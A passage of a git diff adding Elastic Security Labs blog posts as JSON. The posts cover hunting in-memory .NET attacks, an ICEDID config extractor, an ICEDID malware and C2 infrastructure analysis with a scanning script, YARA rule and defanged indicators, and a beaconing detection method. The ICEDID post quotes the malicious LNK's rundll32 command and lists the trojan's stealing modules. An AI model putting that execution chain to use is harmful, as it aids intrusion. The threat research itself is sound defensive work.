module with the Assembly.Load(byte[]) method.\n\n\n\nTo automate this type of hunt, I wrote a PowerShell function called [Get-ClrReflection](https://gist.github.com/dezhub/2875fa6dc78083cedeab10abc551cb58) which looks for this combination of memory characteristics and will save any hits for further analysis. Below is sample output after running it against a workstation that was infected with Empire.\n\n\n\nOnce again, you will see hits for legitimate applications that leverage the Assembly.Load function. One common false positive is for XmlSerializer generated assemblies. Standard hunt practices apply. Bucket your hits by process name or better yet with a fuzzy hash match. For example, ClrGuard (details next) will give you TypeRef hash with a “-f” switch. Below is an example from Empire.\n\n\n\n### Eventing-based detection\n\nEventing-based detecting is great because you won’t need luck that an adversary is active while you are hunting. It also gives you an opportunity to prevent attacker techniques in real-time. To provide signals into the CLR on which .NET runs, we developed and released [ClrGuard](https://github.com/endgameinc/ClrGuard). ClrGuard will hook into all .NET processes on the system. From there, it performs an in-line hook of the native LoadImage() function. This is what Assembly.Load() calls under the CLR hood. When events are observed, they are sent over a named pipe to a monitoring process for further introspection and mitigation decision. For example, Empire’s psinject function can be immediately detected and blocked in real-time as shown in the image below.\n\n\n\nIn a similar manner, OilRig’s ISMInjector can be quickly detected and blocked.\n\n\n\nAnother example below shows ClrGuard in action against Casey Smith’s universal.js tool.\n\n\n\nWhile we don’t recommend you run ClrGuard across your enterprise (it is Proof of Concept grade), we hope it spurs community discussion and innovation against these types of .NET attacks. These sorts of defensive techniques power protection across the Endgame product, and an enterprise-grade ClrGuard-like feature will be coming soon.\n\n## Conclusion\n\nIt is important to thank those doing great offensive security research who are willing to publish their capabilities and tradecraft for the greater good of the community. The recent advancements in .NET in-memory attacks have shown that it is time for defenders to up their game and go toe-to-toe with the more advanced red teams and adversaries. We hope that ClrGuard and Get-ClrReflection help balance the stakes. These tools can increase a defenders optics into .NET malware activities, and raise visibility into this latest evolution of attacker techniques.\n"
+ },
+ "title": "Hunting For In-Memory .NET Attacks",
+ "slug": "hunting-memory-net-attacks",
+ "date": "2022-06-21",
+ "description": "As a follow up to my DerbyCon presentation, this post will investigate an emerging trend of adversaries using .NET-based in-memory techniques to evade detection",
+ "author": [
+ {
+ "slug": "joe-desimone"
+ }
+ ],
+ "image": "photo-edited-04@2x.jpg",
+ "category": [
+ {
+ "slug": "security-research"
+ }
+ ]
+ },
+ "id": "security_labs_content-hunting_memory_net_attacks-md",
+ "type": "security_labs_content"
+}
diff --git a/packages/security_labs_content/kibana/security_labs_content/security_labs_content-icedid_configuration_extractor-md.json b/packages/security_labs_content/kibana/security_labs_content/security_labs_content-icedid_configuration_extractor-md.json
new file mode 100644
index 00000000000..b72a4569614
--- /dev/null
+++ b/packages/security_labs_content/kibana/security_labs_content/security_labs_content-icedid_configuration_extractor-md.json
@@ -0,0 +1,29 @@
+{
+ "attributes": {
+ "raw": {
+ "document": "---\ntitle: \"ICEDID Configuration Extractor\"\nslug: \"icedid-configuration-extractor\"\ndate: \"2022-12-06\"\nsubtitle: \"Configuration extraction tool for ICEDID malware.\"\ndescription: \"Python script to extract the configuration from ICEDID samples.\"\nauthor:\n - slug: elastic-security-labs\nimage: \"tools-image.jpg\"\ncategory:\n - slug: tools\ntags:\n - icedid\n - ref1021\n---\n\nPython script to extract the payload from ICEDID samples.\n\n[Download icedid-configuration-extractor.tar.gz](https://assets.contentstack.io/v3/assets/bltefdd0b53724fa2ce/blt95ce19ae8cffda29/6351abcf20f42038fb989fae/icedid-config-extractor.tar.gz)\n\n> For information on the ICEDID malware and network infrastructure, check out the following resources:\n>\n> - [ICEDIDs network infrastructure is alive and well](https://www.elastic.co/security-labs/icedids-network-infrastructure-is-alive-and-well)\n> - [ICEDID network infrastructure checking utility](https://assets.contentstack.io/v3/assets/bltefdd0b53724fa2ce/bltb86bffd1aef20c5b/6351aba34e565f1cdce29da5/icedid-checker.tar.gz)\n\n## Getting started\n\n### Docker\n\nThe recommended and easiest way to get going is to use Docker. From the directory this README is in, you can build a local container.\n\n```\ndocker build . -t icedid_loader_config_extractor\n```\n\nThen we run the container with the -v flag to map a host directory to the docker container directory.\n\n```\ndocker run -ti --rm -v $(pwd)/data:/data icedid_loader_config_extractor:latest --help\n```\n\n### Running it locally\n\nAs mentioned above, Docker is the recommended approach to running this project, however you can also run this locally. This project uses [Poetry](https://python-poetry.org/) to manage dependencies, testing, and metadata. If you have Poetry installed already, from this directory, you can simply run the following commands to run the tool. This will setup a virtual environment, install the dependencies, activate the virtual environment, and run the console script.\n\n```\npoetry lock\npoetry install\npoetry shell\npoetry lock\npoetry install\npoetry shell\nicedid_loader_config_extractor --help\n```\n\n## Usage\n\nAll samples need to be unpacked prior to execution extraction attempts.\n\nWe can either specify a single sample with **-f** option or a directory of samples with **-d**.\n\n```\ndocker run -ti --rm -v $(pwd)/data:/data icedid_loader_config_extractor:latest -d \"C:\\tmp\\samples\"\n```\n\n\n\nYou can collect the extracted configurations from the directory you set when running the extractor.\n"
+ },
+ "title": "ICEDID Configuration Extractor",
+ "slug": "icedid-configuration-extractor",
+ "subtitle": "Configuration extraction tool for ICEDID malware.",
+ "date": "2022-12-06",
+ "description": "Python script to extract the configuration from ICEDID samples.",
+ "author": [
+ {
+ "slug": "elastic-security-labs"
+ }
+ ],
+ "image": "tools-image.jpg",
+ "category": [
+ {
+ "slug": "tools"
+ }
+ ],
+ "tags": [
+ "icedid",
+ "ref1021"
+ ]
+ },
+ "id": "security_labs_content-icedid_configuration_extractor-md",
+ "type": "security_labs_content"
+}
diff --git a/packages/security_labs_content/kibana/security_labs_content/security_labs_content-icedids_network_infrastructure_is_alive_and_well-md.json b/packages/security_labs_content/kibana/security_labs_content/security_labs_content-icedids_network_infrastructure_is_alive_and_well-md.json
new file mode 100644
index 00000000000..7a39f9bded1
--- /dev/null
+++ b/packages/security_labs_content/kibana/security_labs_content/security_labs_content-icedids_network_infrastructure_is_alive_and_well-md.json
@@ -0,0 +1,39 @@
+{
+ "attributes": {
+ "raw": {
+ "document": "---\ntitle: \"ICEDIDs network infrastructure is alive and well\"\nslug: \"icedids-network-infrastructure-is-alive-and-well\"\ndate: \"2022-10-31\"\ndescription: \"Elastic Security Labs details the use of open source data collection and the Elastic Stack to analyze the ICEDID botnet C2 infrastructure.\"\nauthor:\n - slug: daniel-stepanic\n - slug: seth-goodwin\n - slug: derek-ditch\n - slug: andrew-pease\nimage: \"blog-banner-network-graph-dots.jpg\"\ncategory:\n - slug: attack-pattern\ntags:\n - malware\n - icedid\n - ref1021\n - bokbot\n---\n\n## Key takeaways\n\n- ICEDID is a full-featured trojan that uses TLS certificate pinning to validate C2 infrastructure.\n- While the trojan has been tracked for several years, it continues to operate relatively unimpeded.\n- A combination of open source collection tools can be used to track the C2 infrastructure.\n\n> For information on the ICEDID configuration extractor and C2 infrastructure validator, check out our posts detailing this:\n>\n> - [ICEDID configuration extractor](https://www.elastic.co/security-labs/icedid-configuration-extractor)\n> - [ICEDID network infrastructure checking utility](https://assets.contentstack.io/v3/assets/bltefdd0b53724fa2ce/bltb86bffd1aef20c5b/6351aba34e565f1cdce29da5/icedid-checker.tar.gz)\n\n## Preamble\n\n[ICEDID](https://malpedia.caad.fkie.fraunhofer.de/details/win.icedid), also known as Bokbot, is a modular banking trojan first discovered in 2017 and has remained active over the last several years. It has been recently known more for its ability to load secondary payloads such as post-compromise frameworks like Cobalt Strike, and has been [linked](https://www.trendmicro.com/en_us/research/21/a/expanding-range-and-improving-speed-a-ransomexx-approach.html) to ransomware activity.\n\nICEDID is implemented through a multistage process with different components. Initial access is typically gained through phishing campaigns leveraging malicious documents or file attachments.\n\nWe’ll be discussing aspects of ICEDID in the next couple of sections as well as exploring our analysis technique in tracking ICEDID infrastructure.\n\n- Initial access\n- Command and control\n- Persistence\n- Core functionality\n- Network infrastructure\n\n> As mentioned in the Preamble, ICEDID has been around for many years and has a rich feature set. As the malware has been analyzed multiple times over the years, we are going to focus on some of the more interesting features.\n\n## Initial access\n\nICEDID infections come in many different forms and have been adjusted using different techniques and novel execution chains to avoid detection and evade antimalware products. In this sample, ICEDID was delivered through a phishing email. The email contains a ZIP archive with an embedded ISO file. Inside the ISO file is a Windows shortcut (LNK) that, when double-clicked, executes the first stage ICEDID loader (DLL file).\n\n\n\nThe Windows shortcut target value is configured to execute **%windir%\\system32\\rundll32.exe olasius.dll,PluginInit** calling the **PluginInit** export, which starts the initial stage of the ICEDID infection. This stage is responsible for decrypting the embedded configuration, downloading a GZIP payload from a C2 server, writing an encrypted payload to disk ( **license.dat** ), and transferring execution to the next stage.\n\n\n\nThe first ICEDID stage starts off by deciphering an encrypted configuration blob of data stored within the DLL that is used to hold C2 domains and the campaign identifier. The first 32 bytes represent the XOR key; the encrypted data is then deciphered with this key.\n\n\n\n## Command and control\n\nICEDID constructs the initial HTTP request using cookie parameters that contain hexadecimal data from the infected machine used for fingerprinting the victim machine. This request will proceed to download the GZIP payload irrespective of any previous identifying information.\n\neSentire has [published research](https://www.esentire.com/blog/esentire-threat-intelligence-malware-analysis-gootloader-and-icedid) that describes in detail how the gads, gat, ga, u, and io cookie parameters are created.\n\n\n\nBelow are the cookie parameters and example associated values behind them.\n\n| Parameter | Example Data | Note |\n| --------- | -------------------------------------------------------------------------------------------- | --------------------------------------------------------------------- |\n| \\_\\_gads | 3000901376:1:16212:134 | Contains campaign ID, flag, GetTickCount, number of running processes |\n| \\_\\_gat | 10.0.19044.64 | OS version, architecture |\n| \\_\\_ga | 1.591594.1635208534.76 | Hypervisor/processor information from CPUID/SwitchToThread function |\n| \\_\\_u | 4445534B544F502D4A4B4738455432:6A6F656C2E68656E646572736F6E:33413945354637303742414339393534 | Stores computer name, username, and bot ID |\n| \\_\\_io | 21_3990468985_3832573211_2062024380 | Security Identifier (SID) |\n| \\_\\_gid | 006869A80704 | Encrypted MAC address |\n\nThe downloaded GZIP payload contains a custom structure with a second loader ( **hollow.dat** ) and the encrypted ICEDID core payload ( **license.dat** ). These two files are written to disk and are used in combination to execute the core payload in memory.\n\n\n\nThe next phase highlights a unique element with ICEDID in how it loads the core payload ( **license.dat** ) by using a custom header structure instead of the traditional PE header. Memory is allocated with the sections of the next payload looped over and placed into their own virtual memory space. This approach has been well [documented](https://www.malwarebytes.com/blog/news/2019/12/new-version-of-icedid-trojan-uses-steganographic-payloads) and serves as a technique to obstruct analysis.\n\n\n\nEach section has its memory protection modified by the **VirtualProtect** function to enable read-only or read/write access to the committed region of memory using the **PAGE_READWRITE** constant.\n\n\n\nOnce the image entry point is set up, the ICEDID core payload is then loaded by a call to the [rax x86 register](https://www.cs.uaf.edu/2017/fall/cs301/lecture/09_11_registers.html#:~:text=rax%20is%20the%2064%2Dbit,processors%20with%20the%2080386%20CPU.).\n\n\n\n## Persistence\n\nICEDID will attempt to set up persistence first using a scheduled task, if that fails it will instead create a Windows Registry run key. Using the Bot ID and **RDTSC** instruction, a scheduled task or run key name is randomly generated. A scheduled task is created using **taskschd.dll** , configured to run at logon for the user, and is triggered every 1 hour indefinitely.\n\n\n\n## Core functionality\n\nThe core functionality of the ICEDID malware has been well documented and largely unchanged. To learn more about the core payload and functionality, check out the [Malpedia page](https://malpedia.caad.fkie.fraunhofer.de/details/win.icedid) that includes a corpus of completed research on ICEDID.\n\nThat said, we counted 23 modules during the time of our analysis including:\n\n- MitM proxy for stealing credentials\n- Backconnect module\n- Command execution (PowerShell, cmd)\n- Shellcode injection\n- Collect\n - Registry key data\n - Running processes\n - Credentials\n - Browser cookies\n - System information (network, anti-virus, host enumeration)\n- Search and read files\n- Directory/file listing on user’s Desktop\n\n## ICEDID configuration extractor\n\nElastic Security Labs has released an open source tool, under the Apache 2.0 license, that will allow for configurations to be extracted from ICEDID samples. The tool can be downloaded [here](https://assets.contentstack.io/v3/assets/bltefdd0b53724fa2ce/blt95ce19ae8cffda29/6351abcf20f42038fb989fae/icedid-config-extractor.tar.gz).\n\n\n\n## TLS certificate pinning\n\nPrevious [research](https://research.checkpoint.com/2021/melting-ice-tracking-icedid-servers-with-a-few-simple-steps/) into the ICEDID malware family has highlighted a repetitive way in how the campaigns create their self-signed TLS certificates. Of particular note, this technique for creating TLS certificates has not been updated in approximately 18 months. While speculative in nature, this could be reflective of the fact that this C2 infrastructure is not widely tracked by threat data providers. This allows ICEDID to focus on updating the more transient elements of their campaigns (file hashes, C2 domains, and IP addresses).\n\nThe team at Check Point published in-depth and articulate research on tracking ICEDID infrastructure using ICEDID’s TLS certificate pinning feature. Additionally, Check Point [released a script](https://research.checkpoint.com/2021/melting-ice-tracking-icedid-servers-with-a-few-simple-steps/#Appendix-A:~:text=147.228.198%0A91%5B.%5D193.19.251-,Appendix%20A,-Testing%20a%20server) that takes an IP address and port, and validates the suspect TLS serial number against a value calculated by the ICEDID malware to confirm whether or not the IP address is currently using an ICEDID TLS certificate.\n\nWe are including a wrapper that combines internet scanning data from Censys, and ICEDID C2 infrastructure conviction from the Check Point script. It can be downloaded [here](https://assets.contentstack.io/v3/assets/bltefdd0b53724fa2ce/bltb86bffd1aef20c5b/6351aba34e565f1cdce29da5/icedid-checker.tar.gz).\n\n### Dataset\n\nAs reported by Check Point, the TLS certificate information uses the same Issuer and Subject distinguished names to validate the C2 server before sending any data.\n\n\n\nTo build our dataset, we used the [Censys CLI tool](https://censys-python.readthedocs.io/en/stable/quick-start.html) to collect the certificate data. We needed to make a slight adjustment to the query from Check Point research, but the results were similar.\n\n```\ncensys search 'services.tls.certificates.leaf_data.subject_dn:\"CN=localhost, C=AU, ST=Some-State, O=Internet Widgits Pty Ltd\" and services.tls.certificates.leaf_data.issuer_dn:\"CN=localhost, C=AU, ST=Some-State, O=Internet Widgits Pty Ltd\" and services.port=443'\n\n[\n {\n \"ip\": \"103.208.85.237\",\n \"services\": [\n {\n \"port\": 22,\n \"service_name\": \"SSH\",\n \"transport_protocol\": \"TCP\"\n },\n {\n \"port\": 80,\n \"service_name\": \"HTTP\",\n \"transport_protocol\": \"TCP\"\n },\n {\n \"port\": 443,\n \"service_name\": \"HTTP\",\n \"certificate\": \"c5e7d92ba63be7fb2c44caa92458beef7047d7f987aaab3bdc41161b84ea2850\",\n \"transport_protocol\": \"TCP\"\n }\n ],\n \"location\": {\n \"continent\": \"Oceania\",\n \"country\": \"New Zealand\",\n \"country_code\": \"NZ\",\n\n…truncated…\n```\n\nThis provided us with 113 IP addresses that were using certificates we could begin to attribute to ICEDID campaigns.\n\n### JARM / JA3S\n\nWhen looking at the data from Censys, we also identified other fields that are useful in tracking TLS communications: [JARM](https://github.com/salesforce/jarm) and [JA3S](https://github.com/salesforce/ja3), both TLS fingerprinting tools from the Salesforce team.\n\nAt a high-level, JARM fingerprints TLS servers by _actively_ collecting specific elements of the TLS Server Hello responses. JA3S _passively_ collects values from the TLS Server Hello message. JARM and JA3S are represented as a 62-character or 32-character fingerprint, respectively.\n\n\n\nJARM and JA3S add additional data points that improve our confidence in connecting the ICEDID C2 infrastructure. In our research, we identified **2ad2ad16d2ad2ad22c2ad2ad2ad2adc110bab2c0a19e5d4e587c17ce497b15** as the JARM and **e35df3e00ca4ef31d42b34bebaa2f86e** as the JA3S fingerprints.\n\n> It should be noted that JARM and JA3S are frequently not uncommon enough to convict a host by themselves. As an example, in the Censys dataset, the JARM fingerprint identified over 15k hosts, and the JA3S fingerprint identified over 3.3M hosts. Looking at the JARM and JA3S values together still had approximately 8k hosts. These are data points on the journey to an answer, not the answer itself.\n\n### ICEDID implant defense\n\nBefore ICEDID communicates with its C2 server, it performs a TLS certificate check by comparing the certificate serial number with a hash of the certificate's public key. As certificate serial numbers should all be unique, ICEDID uses a self-signed certificate and an expected certificate serial number as a way to validate the TLS certificate. If the hash of the public key and serial number do not match, the communication with the C2 server does not proceed.\n\n\n\nWe used the Check Point Python script (which returns a **true** or **false** result for each passed IP address) to perform an additional check to improve our confidence that the IP addresses were part of the ICEDID C2 infrastructure and not simply a coincidence in having the same subject and issuer information of the ICEDID TLS certifications. A **true** result has a matching ICEDID fingerprint and a **false** result does not. This resulted in 103 IPs that were confirmed as having an ICEDID TLS certificate and 10 that did not (as of October 14, 2022).\n\n\n\n### Importing into Elasticsearch\n\nNow that we have a way to collect IPs based on the TLS certificate elements and a way to add additional context to aid in conviction; we can wrap the logic in a Bash script as a way to automate this process and parse the data for analysis in Elasticsearch.\n\n```\n#!/bin/bash -eu\n\nset -o pipefail\n\nSEARCH='services.tls.certificates.leaf_data.subject_dn:\"CN=localhost, C=AU, ST=Some-State, O=Internet Widgits Pty Ltd\" and services.tls.certificates.leaf_data.issuer_dn:\"CN=localhost, C=AU, ST=Some-State, O=Internet Widgits Pty Ltd\" and services.port=443'\n\nwhile read -r line; do\n _ts=$(date -u +%FT%TZ)\n _ip=$(echo ${line} | base64 -d | jq '.ip' -r)\n _port=$(echo ${line} | base64 -d | jq '.port' -r)\n _view=$(censys view \"${_ip}\" | jq -c)\n _is_icedid=$(python3 -c \"import icedid_checker; print(icedid_checker.test_is_icedid_c2('${_ip}','${_port}'))\")\n\n echo \"${_view}\" | jq -S --arg is_icedid \"${_is_icedid}\" --arg timestamp \"${_ts}\" '. + {\"@timestamp\": $timestamp, \"threat\": {\"software\": {\"icedid\": {\"present\": $is_icedid}}}}'\ndone < <(censys search --pages=-1 \"${SEARCH}\" | jq '.[] | {\"ip\": .ip, \"port\": (.services[] | select(.certificate?).port)} | @base64' -r) | tee icedid_infrastructure.ndjson\n```\n\nThis outputs the data as an NDJSON document called **icedid_infrastructure.ndjson** that we can upload into Elasticsearch.\n\n\n\nIn the above image, we can see that there are hosts that have the identified JARM fingerprint, the identified TLS issuer and subject elements, but did not pass the Check Point validation check. Additionally, one of the two hosts has a different JA3S fingerprint. This highlights the value of the combination of multiple data sources to inform confidence scoring.\n\nWe are also [providing this script](https://assets.contentstack.io/v3/assets/bltefdd0b53724fa2ce/bltb86bffd1aef20c5b/6351aba34e565f1cdce29da5/icedid-checker.tar.gz) for others to use.\n\n## Observed adversary tactics and techniques\n\nElastic uses the MITRE ATT&CK framework to document common tactics, techniques, and procedures that advanced persistent threats use against enterprise networks.\n\nAs stated above, ICEDID has been extensively analyzed, so below we are listing the tactics and techniques that we observed and are covered in this research publication. If you’re interested in the full set of MITRE ATT&CK tactics and techniques, you can check out MITRE’s [page](https://attack.mitre.org/software/S0483/) on ICEDID.\n\n### Tactics\n\nTactics represent the why of a technique or sub-technique. It is the adversary’s tactical goal: the reason for performing an action.\n\n- [Discovery](https://attack.mitre.org/tactics/TA0007/)\n- [Execution](https://attack.mitre.org/tactics/TA0002)\n- [Persistence](https://attack.mitre.org/tactics/TA0003)\n- [Defense evasion](https://attack.mitre.org/tactics/TA0005)\n- [Reconnaissance](https://attack.mitre.org/tactics/TA0043)\n- [Resource development](https://attack.mitre.org/tactics/TA0042)\n- [Initial access](https://attack.mitre.org/tactics/TA0001)\n- [Command and control](https://attack.mitre.org/tactics/TA0011)\n- [Privilege Escalation](https://attack.mitre.org/tactics/TA0004)\n\n### Techniques / Sub techniques\n\nTechniques and Sub techniques represent how an adversary achieves a tactical goal by performing an action.\n\n- [Permission Groups Discovery](https://attack.mitre.org/techniques/T1069/)\n- [Account Discovery](https://attack.mitre.org/techniques/T1087/)\n- [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1087/)\n- [Software Discovery](https://attack.mitre.org/techniques/T1518/)\n- [System Binary Proxy Execution](https://attack.mitre.org/techniques/T1218/)\n- [Remote System Discovery](https://attack.mitre.org/techniques/T1018/)\n- [Network Share Discovery](https://attack.mitre.org/techniques/T1135/)\n- [Phishing: Spearphishing attachment](https://attack.mitre.org/techniques/T1566/001)\n- [Scheduled Task/Job: Scheduled Task](https://attack.mitre.org/techniques/T1053/005/)\n- [Obfuscated Files or Information](https://attack.mitre.org/techniques/T1027/)\n- [Process Injection](https://attack.mitre.org/techniques/T1055/)\n\n## Detections and preventions\n\n### Detection logic\n\n- [Enumeration of Administrator Accounts](https://www.elastic.co/guide/en/security/current/enumeration-of-administrator-accounts.html)\n- [Command Shell Activity Started via RunDLL32](https://www.elastic.co/guide/en/security/current/command-shell-activity-started-via-rundll32.html)\n- [Security Software Discovery using WMIC](https://www.elastic.co/guide/en/security/current/security-software-discovery-using-wmic.html)\n- [Suspicious Execution from a Mounted Device](https://www.elastic.co/guide/en/security/current/suspicious-execution-from-a-mounted-device.html)\n- [Windows Network Enumeration](https://www.elastic.co/guide/en/security/current/windows-network-enumeration.html)\n\n### Preventions\n\n- Malicious Behavior Detection Alert: Command Shell Activity\n- Memory Threat Detection Alert: Shellcode Injection\n- Malicious Behavior Detection Alert: Unusual DLL Extension Loaded by Rundll32 or Regsvr32\n- Malicious Behavior Detection Alert: Suspicious Windows Script Interpreter Child Process\n- Malicious Behavior Detection Alert: RunDLL32 with Unusual Arguments\n- Malicious Behavior Detection Alert: Windows Script Execution from Archive File\n\n### YARA\n\nElastic Security has created [YARA rules](https://github.com/elastic/protections-artifacts/blob/main/yara/rules/Windows_Trojan_IcedID.yar) to identify this activity. Below is a YARA rule specifically to identify the TLS certificate pinning function used by ICEDID.\n\n```\nrule Windows_Trojan_IcedID_cert_pinning {\n meta:\n author = \"Elastic Security\"\n creation_date = \"2022-10-17\"\n last_modified = \"2022-10-17\"\n threat_name = \"Windows.Trojan.IcedID\"\n arch_context = \"x86\"\n license = \"Elastic License v2\"\n os = \"windows\"\n strings:\n\t\t$cert_pinning = { 74 ?? 8B 50 ?? E8 ?? ?? ?? ?? 48 8B 4C 24 ?? 0F BA F0 ?? 48 8B 51 ?? 48 8B 4A ?? 39 01 74 ?? 35 14 24 4A 38 39 01 74 ?? }\n condition:\n $cert_pinning\n}\n```\n\n## References\n\nThe following were referenced throughout the above research:\n\n- [https://malpedia.caad.fkie.fraunhofer.de/details/win.icedid](https://malpedia.caad.fkie.fraunhofer.de/details/win.icedid)\n- [https://research.checkpoint.com/2021/melting-ice-tracking-icedid-servers-with-a-few-simple-steps/](https://research.checkpoint.com/2021/melting-ice-tracking-icedid-servers-with-a-few-simple-steps/)\n- [https://attack.mitre.org/software/S0483/](https://attack.mitre.org/software/S0483/)\n\n## Indicators\n\nThe indicators observed in this research are posted below. All artifacts (to include those discovered through TLS certificate pinning) are also [available for download](https://assets.contentstack.io/v3/assets/bltefdd0b53724fa2ce/bltc090b3574bb4e7be/633615e4a920fd42f67e7534/ref2731-indicators.zip) in both ECS and STIX format in a combined zip bundle.\n\n| Indicator | Type | Note |\n| ---------------------------------------------------------------- | --------- | -------------------- |\n| db91742b64c866df2fc7445a4879ec5fc256319e234b1ac5a25589455b2d9e32 | SHA256 | ICEDID malware |\n| yolneanz[.]com | domain | ICEDID C2 domain |\n| 51.89.190[.]220 | ipv4-addr | ICEDID C2 IP address |\n"
+ },
+ "title": "ICEDIDs network infrastructure is alive and well",
+ "slug": "icedids-network-infrastructure-is-alive-and-well",
+ "date": "2022-10-31",
+ "description": "Elastic Security Labs details the use of open source data collection and the Elastic Stack to analyze the ICEDID botnet C2 infrastructure.",
+ "author": [
+ {
+ "slug": "daniel-stepanic"
+ },
+ {
+ "slug": "seth-goodwin"
+ },
+ {
+ "slug": "derek-ditch"
+ },
+ {
+ "slug": "andrew-pease"
+ }
+ ],
+ "image": "blog-banner-network-graph-dots.jpg",
+ "category": [
+ {
+ "slug": "attack-pattern"
+ }
+ ],
+ "tags": [
+ "malware",
+ "icedid",
+ "ref1021",
+ "bokbot"
+ ]
+ },
+ "id": "security_labs_content-icedids_network_infrastructure_is_alive_and_well-md",
+ "type": "security_labs_content"
+}
diff --git a/packages/security_labs_content/kibana/security_labs_content/security_labs_content-identifying_beaconing_malware_using_elastic-md.json b/packages/security_labs_content/kibana/security_labs_content/security_labs_content-identifying_beaconing_malware_using_elastic-md.json
new file mode 100644
index 00000000000..a3e078de887
--- /dev/null
+++ b/packages/security_labs_content/kibana/security_labs_content/security_labs_content-identifying_beaconing_malware_using_elastic-md.json
@@ -0,0 +1,33 @@
+{
+ "attributes": {
+ "raw": {
+ "document": "---\ntitle: \"Identifying beaconing malware using Elastic\"\nslug: \"identifying-beaconing-malware-using-elastic\"\ndate: \"2023-03-01\"\ndescription: \"In this blog, we walk users through identifying beaconing malware in their environment using our beaconing identification framework.\"\nauthor:\n - slug: apoorva-joshi\n - slug: thomas-veasey\n - slug: craig-chamberlain\nimage: \"blog-thumbnail-securitymaze.jpg\"\ncategory:\n - slug: machine-learning\n - slug: detection-science\n---\n\nThe early stages of an intrusion usually include initial access, execution, persistence, and command-and-control (C2) beaconing. When structured threats use zero-days, these first two stages are often not detected. It can often be challenging and time-consuming to identify persistence mechanisms left by an advanced adversary as we saw in the [2020 SUNBURST supply chain compromise](https://www.elastic.co/blog/elastic-security-provides-free-and-open-protections-for-sunburst). Could we then have detected SUNBURST in the initial hours or days by finding its C2 beacon?\n\nThe potential for beaconing detection is that it can serve as an early warning system and help discover novel persistence mechanisms in the initial hours or days after execution. This allows defenders to disrupt or evict the threat actor before they can achieve their objectives. So, while we are not quite \"left of boom\" by detecting C2 beaconing, we can make a big difference in the outcome of the attack by reducing its overall impact.\n\nIn this blog, we talk about a beaconing identification framework that we built using Painless and aggregations in the Elastic Stack. The framework can not only help threat hunters and analysts monitor network traffic for beaconing activity, but also provides useful indicators of compromise (IoCs) for them to start an investigation with. If you don’t have an Elastic Cloud cluster but would like to try out our beaconing identification framework, you can start a [free 14-day trial](https://cloud.elastic.co/registration) of Elastic Cloud.\n\n## **Beaconing — A primer**\n\nAn enterprise's defense is only as good as its firewalls, antivirus, endpoint detection and intrusion detection capabilities, and SOC (Security Operations Center) — which consists of analysts, engineers, operators administrators, etc. who work round the clock to keep the organization secure. Malware however, enters enterprises in many different ways and uses a variety of techniques to go undetected. An increasingly common method being used by adversaries nowadays to evade detection is to use C2 beaconing as a part of their attack chain, given that it allows them to blend into networks like a normal user.\n\nIn networking, beaconing is a term used to describe a continuous cadence of communication between two systems. In the context of malware, beaconing is when malware periodically calls out to the attacker's C2 server to get further instructions on tasks to perform on the victim machine. The frequency at which the malware checks in and the methods used for the communications are configured by the attacker. Some of the common protocols used for C2 are HTTP/S, DNS, SSH, and SMTP, as well as common cloud services like Google, Twitter, Dropbox, etc. Using common protocols and services for C2 allows adversaries to masquerade as normal network traffic and hence evade firewalls.\n\nWhile on the surface beaconing can appear similar to normal network traffic, it has some unique traits with respect to timing and packet size, which can be modeled using standard statistical and signal processing techniques.\n\nBelow is an example of a Koadic C2 beacon, which serves the malicious payload using the DLL host process. As you can see, the payload beacons consistently at an interval of 10 minutes, and the source, as well as destination packet sizes, are almost identical.\n\n\n\nIt might seem like a trivial task to catch C2 beaconing if all beacons were as neatly structured and predictable as the above. All one would have to look for is periodicity and consistency in packet sizes. However, malware these days is not as straightforward.\n\n\n\nMost sophisticated malware nowadays adds a \"jitter\" or randomness to the beacon interval, making the signal more difficult to detect. Some malware authors also use longer beacon intervals. The beaconing identification framework we propose accounts for some of these elusive modifications to traditional beaconing behavior.\n\n## **Our approach**\n\nWe’ve discussed a bit about the why and what — in this section we dig deeper into how we identify beaconing traffic. Before we begin, it is important to note that beaconing is merely a communication characteristic. It is neither good nor evil by definition. While it is true that malware heavily relies on beaconing nowadays, a lot of legitimate software also exhibits beaconing behaviour.\n\nWhile we have made efforts to reduce false positives, this framework should be looked at as a means for beaconing identification to help reduce the search space for a threat hunt, not as a means for detection. That said, indicators produced by this framework, when combined with other IoCs, can potentially be used to detect on malicious activity.\n\nThe beacons we are interested in comprise traffic from a single running process on a particular host machine to one or more external IPs. Given that the malware can have both short (order of seconds) and long (order of hours or days) check-in intervals, we will restrict our attention to a time window that works reasonably for both and attempt to answer the question: “What is beaconing in my environment right now or recently?” We have also parameterized the inputs to the framework to allow users to configure important settings like time window, etc. More on this in upcoming sections.\n\nWhen dealing with large data sets, such as network data for an enterprise, you need to think carefully about what you can measure, which allows you to scale effectively. Scaling has several facets, but for our purposes, we have the following requirements:\n\n1. Work can be parallelised over different shards of data stored on different machines\n2. The amount of data that needs to move around to compute what is needed must be kept manageable.\n\nMultiple approaches have been suggested for detecting beaconing characteristics, but not all of them satisfy these constraints. For example, a popular choice for detecting beacon timing characteristics is to measure the interval between events. This proves to be too inefficient to use on large datasets because the events can't be processed across multiple shards.\n\nDriven by the need to scale, we chose to detect beaconing by bucketing the data in the time window to be analyzed. We gather the event count and average bytes sent and received in each bucket. These statistics can be computed in MapReduce fashion and values from different shards can be combined at the coordinating node of an Elasticsearch query.\n\nFurthermore, by controlling the ratio between the bucket and window lengths, the data we pass per running process has predictable memory consumption, which is important for system stability. The whole process is illustrated diagrammatically below:\n\n\n\nA key attribute of beaconing traffic is it often has similar netflow bytes for the majority of its communication. If we average the bytes over all the events that fall in a single bucket, the average for different buckets will in fact be even more similar. This is just the law of large numbers in action. A good way to measure similarity of several positive numbers (in our case these are average bucket netflow bytes) is using a statistic called the [coefficient of variation](https://en.wikipedia.org/wiki/Coefficient_of_variation) (COV). This captures the average relative difference between the values and their mean. Because this is a relative value, a COV closer to 0 implies that values are tightly clustered around their mean.\n\nWe also found that occasional spikes in the netflow bytes in some beacons were inflating the COV statistic. In order to rectify this, we simply discarded low and high percentile values when computing the COV, which is a standard technique for creating a robust statistic. We threshold the value of this statistic to be significantly less than one to detect this characteristic of beacons.\n\nFor periodicity, we observed that signals displayed one of two characteristics when we viewed the bucket counts. If the period was less than the time bucket length (i.e. high frequency beacons), then the count showed little variation from bucket to bucket. If the period was longer than the time bucket length (i.e. low frequency beacons), then the signal had high autocorrelation. Let's discuss these in detail.\n\nTo test for high frequency beacons, we use a statistic called [relative variance](https://en.wikipedia.org/wiki/Index_of_dispersion) (RV). The rate of many naturally occurring phenomena are well described by a [Poisson distribution](https://en.wikipedia.org/wiki/Poisson_distribution#Occurrence_and_applications). The reason for this is that if events arrive randomly at a constant 